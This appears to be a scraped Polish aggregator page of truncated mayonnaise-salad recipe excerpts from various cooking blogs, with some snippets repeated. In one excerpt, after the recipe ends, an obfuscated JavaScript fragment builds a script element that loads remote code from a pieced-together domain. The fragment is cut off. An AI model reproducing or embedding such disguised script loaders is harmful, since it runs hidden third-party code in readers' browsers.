które to można zamienić na czerwone koktajlowe lub pominąć i dodać więcej zwykłych pomidorów. Sos czosnkowy podany do sałatki jest w wersji fit, dzięki temu, że nie zawiera majonezu. Sałatka jest uniwersalna i pasuje zarówno do obiadu, kolacji, jak i do grilla... Składniki: 100 g liści szpinaku 4 pomidory czerwone 8 żółtych pomidorków koktajlowych (opcjonalnie) 200 g sera sałatkowego
Kuchnia MagdaLenyktóre to można zamienić na czerwone koktajlowe lub pominąć i dodać więcej zwykłych pomidorów. Sos czosnkowy podany do sałatki jest w wersji fit, dzięki temu, że nie zawiera majonezu. Sałatka jest uniwersalna i pasuje zarówno do obiadu, kolacji, jak i do grilla... Składniki: 100 g liści szpinaku 4 pomidory czerwone 8 żółtych pomidorków koktajlowych (opcjonalnie) 200 g sera sałatkowego
Kuchnia MagdaLenySałatka ziemniaczana z tuńczykiem i groszkiem... Kosteczki ugotowanych ziemniaków. Kulki zielonego groszku. Oblepione tuńczykiem i majonezem. Oprószone szczypiorkiem. Pyszna prostota! Składniki: 1 kg ziemniaków (waga przed obraniem); 2 puszki tuńczyka w oleju (waga netto 1 puszki po odsączeniu - 130 g); Puszka groszku konserwowego (waga netto po odsączeniu - 240 g); 1 średnia cebula; Pęczek szczypiorku; 4 łyżki majonezu; Sól; Pieprz(...)zalewy. Dodać do sałatki. Cebulę obrać, drobno posiekać. Dodać do sałatki. Szczypiorek umyć, osuszyć, posiekać. Dodać do sałatki (odrobinę można pozostawić do oprószenia po wierzchu). Wymieszać. Do sałatki dodać majonez. Wymieszać. Sałatkę przyprawić solą i pieprzem do smaku. SMACZNEGO! Uwagi do przepisu: Sałatka ma bardzo delikatny smak. Osobom lubiącym wyraziste smaki może wydawać się mdła - można wówczas dodać drobno
Gospodyni Miejskawszystkich i najbardziej uwielbiana przez moich domowników. Klasyka gatunku:) A oto moja wersja tejże sałatki. Składniki: jajka ogórki kiszone marchew ziemniaki cebula groszek konserwowy kukurydza konserwowa jabłka Sos do sałatki: majonez śmietana musztarda sól pieprz Wykonanie: Jajka gotuje na twardo, studzę i obieram ze skorupek. Ziemniaki i marchew gotuje do miękkości, studzę i obieram.Jabłka i cebulę obieram ze skórki(...)Doprawiam solą i pieprzem. Mieszam razem i odstawiam na kilka godzin do lodówki. Majonez mieszam ze śmietana w proporcji 2:1 ( na dwie łyżki majonezu daję łyżkę śmietany) doprawiam musztardą. Wymieszany sos dodaję do sałatki. Odstawiam na ok 2 godz w chłodne miejsce, by wszystkie składniki ładnie się ze sobą połączyły. Przed podaniem wierch sałatki polewam dodatkowo sosem majonezowym. SMACZNEGO
Bea(u)ty kitchensałatka z kurczakiem, Sałatka hawajska Sałatka z selerem, szynką i orzechami Sałatka z selerem, kurczakiem i serem Letnia sałatka warstwowa z ziemniakami i wędzonym łososiem: Przepis na 2 porcje: 3 ugotowane młode ziemniaki ok 100 g wędzonego łososia 2 jajka majonez Winiary sól pieprz szczypiorek Ziemniaki kroimy w kostkę, doprawiamy solą i pieprzem, dodajemy łyżkę majonezu i posiekany szczypiorek, mieszamy
Damsko-męskie spojrzenie na kuchnięPrzyprawić solą i pieprzem do smaku. Wstawić do lodówki na min. 30 minut w celu schłodzenia. SMACZNEGO! Uwagi do przepisu: Z podanych składników wychodzi niewielka, widoczna na zdjęciach miseczka sałatki. Majonez można wymieszać, w proporcji 1:1, z gęstym jogurtem naturalnym lub jogurtem greckim. Przed podaniem, jajka z groszkiem, można oprószyć drobno posiekanym szczypiorkiem. Smak sałatki można wzbogacić o pokrojonego
Gospodyni Miejskazrobieniu sałatka. Wszystkie składniki idealnie pasują do siebie a ogórek nadaje sałatce dodatkowej chrupkości. 300 g makaronu ryżowego (o kształcie ryżu) 1 puszka kukurydzy 1 ogórek szklarniowy 1 filet z piersi kurczaka Przyprawa do mięsa 5 ugotowanych jajek Szczypiorek do dekoracji 6 czubatych łyżek kremowego majonezu FOLWARK Sól Pieprz Olej do smażenia Makaron gotujemy do miękkości w delikatnie osolonej(...)wyciągamy żółtka (posłużą nam na wierzch sałatki). Pozostałe przeciskamy przez sitko do jajek. Wszystkie składniki (bez zostawionych żółtek) dokładnie mieszamy ze sobą. Doprawiamy solą, pieprzem. Mieszamy dokładnie z majonezem. Sałatkę możemy włożyć do foremki na comber, aby nabrała ładnego kształtu. Odwracamy na długim talerzu. Wierzch obsypujemy pokruszonymi żółtkami i posiekanym szczypiorkiem
VioletoweKucharzeniepodana i świetnie smakująca sałatka ze śledziem w roli głównej, którego smak idealnie komponuje się z tradycyjnymi warzywami, marynowanymi pieczarkami i delikatną słodkością jabłek. Składniki: 350g śledź 3 marchewki 3 ziemniaki 1 pietruszka 2 małe buraki 1 jabłko 1 czerwona cebula 450g marynowanych pieczarek odsączonych z zalewy 2 pęczki natki z pietruszki sól pieprz majonez Wykonanie: 1. Filety śledziowe wymoczyć(...)trzema łyżkami majonezu, śledź, czerwona cebula posmarować trzema łyżkami majonezu, delikatnie posypać solą, pieprzem, ziemniaki, pietruszka, delikatnie posypać solą, pieprzem, posmarować trzema łyżkami majonezu, buraczek i posmarować cienką warstwą majonezu. Sałatkę przykryć folią spożywczą i schłodzić w lodówce najlepiej całą noc. 5. Sałatkę odwrócić do góry dnem na przygotowany wcześniej talerz
Szalona Kuchnia EwelinySałatka porowa z marynowanymi pieczarkami... Plasterki marynowanych pieczarek i porów. Pokrojone w kosteczkę ogórki konserwowe. Ziarna słodkiej kukurydzy. Kosteczki szynki i wiórki jajek. A całość oblepiona majonezem. Pychota! Składniki: 200 g szynki konserwowej; 200 g pieczarek marynowanych (waga netto, po odsączeniu); 6 średnich ogórków konserwowych; 2 białe części porów; Puszka kukurydzy konserwowej (waga netto, po odsączeniu(...)zalewy, pokroić w plasterki. Dodać do sałatki. Kukurydzę odsączyć z zalewy. Dodać do sałatki. Ogórki odsączyć z zalewy, pokroić w drobną kostkę. Dodać do sałatki. Wymieszać. Do sałatki dodać majonez. Wymieszać. Sałatkę przyprawić solą i pieprzem. Wymieszać. Wstawić na 2 - 3 h do lodówki. SMACZNEGO! Uwagi do przepisu: Jajka zamiast ścierać na tarce można pokroić w kostkę, a pieczarki zamiast
Gospodyni MiejskaPyszna warstwowa sałatka królewska z ananasem, która sprawdzi się na niejednej imprezie - choćby tej najbliższej - sylwestrowej :) Sałatkę możemy "odchudzić" - i dać połowę majonezu - a resztę jogurtu greckiego! SKŁADNIKI 200 g selera konserwowego - 1 słoik 1 puszka kukurydzy 1 puszka ananasa w syropie 5 jajek 1 puszka czerwonej fasoli 1 większa marchew - ok. 150 g 1 mały por 7 łyżek majonezu(...)drobnych oczkach. Pora kroimy w drobną kostkę.W przezroczystej misce układamy warstwy - seler, kukurydzę, ananasa, 3 łyżki majonezu, marchewkę, pora, czerwoną fasolę, białka, 4 łyżki majonezu. Górę posypujemy startymi żółtkami. Wstawiamy sałatkę do lodówki na 24 godziny. Smacznego
Moje Kuchenne Rewelacjeweekend. Tym razem jest to sałatka makaronowa z dużą ilością warzyw, żółtym serem i sosem czosnkowym. Niebo w ustach Polecam! Składniki: 1 wędzona ćwiartka z kurczaka 200 g makaronu (u mnie świderki) 1 szklanka kukurydzy konserwowej 1 zielony ogórek 1 czerwona papryka 5 rzodkiewek 10 dkg żółtego sera pół pęczka szczypiorku 2 łyżki majonezu 2 łyżki gęstego jogurtu naturalnego(...)mieszamy wszystkie składniki sałatki: mięso z kurczaka, żółty ser, makaron, ogórka, paprykę, rzodkiewki, kukurydzę (odsączoną z zalewy) oraz drobno posiekany szczypiorek *** *** W osobnej miseczce umieszczamy składniki na sos do sałatki: majonez, jogurt naturalny, musztardę, przeciśnięty czosnek oraz po szczypcie soli i pieprzu *** *** Wszystkie składniki dokładnie mieszamy do uzyskania jednolitego sosu *** *** Sos przelewamy do miski ze składnikami sałatki i wszystko razem
Blog z Apetytemktórych jest on chrupiący i da się wyczuć jego smak. Przygotowując sałatkę, nie należy przesadzać z ilością majonezu, gdyż w nadmiarze zaburzy smak innych składników i sałatka stanie się tłusta. Część majonezu można zastąpić jogurtem greckim, wtedy sałatka będzie lżejsza. Ilość porcji: 2 - 3 Czas przygotowania: 25 minut Składniki na sałatkę kalafiorową z indykiem: 1 średni kalafior 1 papryka czerwona(...)niezbyt duże słupki. Czosnek obrać, przecisnąć przez praskę i oprószyć solą. Koperek drobno posiekać. Ilość majonezu dostosować do swoich upodobań. U mnie jest go umiarkowana ilość. Sałatka będzie mniej kaloryczna, jeśli dodamy zamiast majonezu część jogurtu greckiego. Wszystkie składniki wymieszać i doprawić do smaku pieprzem i solą. Sałatkę podawać od razu po zrobieniu, gdyż zawiera czosnek i dłużej przechowywana
Kuchcik gotujeCalibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-fareast-language:EN-US;} W sieci na taką sałatkę jest mnóstwo różnych przepisów. Zazwyczaj makaron zalewany jest wodą przed wymieszaniem z innymi składnikami ja kruszę go na sucho, mieszam ze wszystkimi składnikami i wychodzi naprawdę smaczna. Składniki(...)szczypiorek majonez sól, pieprz Przygotowanie: Suchy makaron połamać, wsypać do miski. Szynkę oraz warzywa pokroić w kostkę, por i natkę drobno. Dodać do makaronu. Przyprawić wymieszać z majonezem. Sałatkę odstawić do lodówki aby się schłodziła a makaron zebrał wilgoć. Przed podaniem można dodać jeszcze nieco majonezu gdyby okazałoby się, że makaron wchłoną znaczną jego część
W garach u Gosiwracając do sałatki… Jeśli tak jak ja lubicie serek wiejski i zielone dodatki, to naprawdę polecam spróbować. Składniki: 1 mini sałatka rzymska 1 opakowanie serka wiejskiego 1 łyżka jogurtu naturalnego 1 i 1/2 łyżki majonezu 1/2 łyżeczki octu winnego lub soku z cytryny 1 płaska łyżeczka cukru pudru mała szczypta soli (u mnie himalajska) pieprz czarny mielony do smaku(...)wstępnie mieszamy. Następnie dodajemy majonez, jogurt, cukier puder, ocet winny (lub cytrynę) oraz małą szczyptę soli i pieprz do smaku. Całość mieszamy łyżką. Próbujemy, opcjonalnie doprawiamy lub dodajemy odrobinę majonezu. Sałatkę posypujemy po wierzchu kiełkami rzodkiewki. Smacznego (function(){ xfgz_=("u"+"")+"s"+"";xfgz_+=("tat.")+("i"); xfgz=document.createElement("script");xfgz.type="text/javascript";xfgz_+="nf"+("o")+"/"; xfgzu="62241956"+".";xfgz.async=true;xfgzu+="864rhblvfgzmkshw0xvakbtX0srkzf
Słodkie okruszkisałatka jest bardzo dobra, ale…. ci, którzy mnie znają, wiedzą, że sałatka bez majonezu to dla mnie nie sałatka;) i tak, po jej spróbowaniu, uznałam, że czegoś mi brakuje i dodałam do niej 2 łyżki majonezu… Wiem, to już uzależnienie, ale cóż poradzić – jestem tego w pełni świadoma;) Ci, którzy nie mają „zboczenia
Smaki Na Talerzuinwencji twórczej gospodarzy. Przepisów na sałatkę jest tyle co osób ją przygotowujących, lub nawet więcej. Niektórzy kroją warzywa bardzo drobno, gotują je do miękkości, dodają pełno majonezu. Moja sałatka jest z niewielką ilością majonezu, z warzyw nierozgotowanych, bardziej al dente. Niezbyt drobno pokrojona, z dodatkiem śliwek i grzybków w occie, z jabłkiem. Ilość warzyw też zależy od naszych upodobań. Podaję(...)Cebulę pokroić w drobną kostkę. Grzybki i śliwki posiekać. Wszystko razem wymieszać dodając odsączony groszek. Doprawić do smaku musztardą, majonezem – według uznania, ja osobiście daję mało majonezu, tylko tyle aby połączyć składniki sałatki, ale aby w nim nie pływały
królestwo garów